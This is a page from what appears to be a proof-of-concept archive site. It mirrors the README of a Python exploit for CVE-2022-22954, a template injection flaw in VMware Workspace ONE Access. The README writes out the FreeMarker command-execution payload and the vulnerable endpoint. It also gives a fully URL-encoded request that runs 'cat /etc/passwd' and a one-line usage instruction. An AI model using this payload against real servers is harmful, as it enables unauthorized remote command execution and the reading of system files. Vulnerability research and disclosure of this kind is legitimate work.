Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-22954 PoC — VMware 多款产品代码注入漏洞

Source
Associated Vulnerability
Title:VMware 多款产品代码注入漏洞 (CVE-2022-22954)
Description:Vmware Workspace One Access是美国Vmware公司的将用户身份与设备和网络信息等因素结合起来,为 Workspace One 交付的应用程序制定智能驱动的条件访问决策。 VMware 多款产品存在代码注入漏洞,该漏洞源于不正确的输入验证。远程攻击者利用该漏洞发送特制的HTTP请求并执行服务器端模板注入。
Description
Proof of Concept for exploiting VMware CVE-2022-22954
Readme
# VMware-CVE-2022-22954-Command-Injector

Proof of Concept for exploiting VMware CVE-2022-22954

## How it works

This simple Python script makes a GET request to the specified URL appended with `/catalog-portal/ui/oauth/verify?error=&deviceUdid=` and then followed by a URL encoded version of this string:

```js
${"freemarker.template.utility.Execute"?new()("command")}
```

For example, an output for "cat /etc/passwd" would look like the following:
`{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d`

## Instructions

 ```bash
 python3 exploit.py <URL>
 ```

## References
 - https://github.com/sherlocksecurity/VMware-CVE-2022-22954
File Snapshot

[4.0K] /data/pocs/57a648f48ed24358cb618195f9b8f98695395397 ├── [2.5K] exploit.py └── [ 841] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.